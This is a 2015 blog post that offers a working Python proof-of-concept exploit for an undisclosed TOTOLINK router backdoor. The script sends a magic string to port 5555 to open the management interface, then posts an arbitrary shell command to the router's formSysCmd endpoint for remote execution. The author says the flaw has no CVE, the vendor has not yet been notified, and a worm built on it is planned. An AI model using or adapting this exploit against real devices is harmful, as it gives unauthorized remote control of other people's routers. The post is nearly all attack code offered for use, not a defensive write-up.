Thursday, August 13, 2015

TOTOLINK backdoor exploitation POC

The following is a simple router exploit POC for giggles, based on the following vulnerability. It would appear this doesn't even have a CVE, nor has the manufacturer been notified. I will be notifying the manufacturer and will also be writing another worm POC based on this exploit lol.
#!/usr/bin/env python
# ------------------------------------------------------------------------------
# THE SCOTCH-WARE LICENSE (Revision 43):
# <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a shot of scotch in return
# ------------------------------------------------------------------------------
import socket, sys, urllib

if len(sys.argv) < 2:
    print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
    exit(1)

commandstr = urllib.quote_plus(" ".join(sys.argv[2:]))

def check_activate_backdoor():
    try:
        vulnerable = "hel,xasf"     # this is both the check, and the command to open the management interface to the internet
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send(vulnerable)
        ret = True if s.recv(len(vulnerable)) == vulnerable else False
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return ret

def close_backdoor():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send("oki,xasf")
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return

if check_activate_backdoor():
    print("\x1b[032mThis device appears to be vulnerable\nbackdoor activated\x1b[0m")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 80))
        s.send("POST /boafrm/formSysCmd HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr)
        
        print("\x1b[032mCommands sent\x1b[0m")
        print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512))
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    close_backdoor()
    exit(0)
else:
    print("\x1b[032mThis device isn't vulnerable lol\x1b[0m")
    exit(1)


No comments :

Post a Comment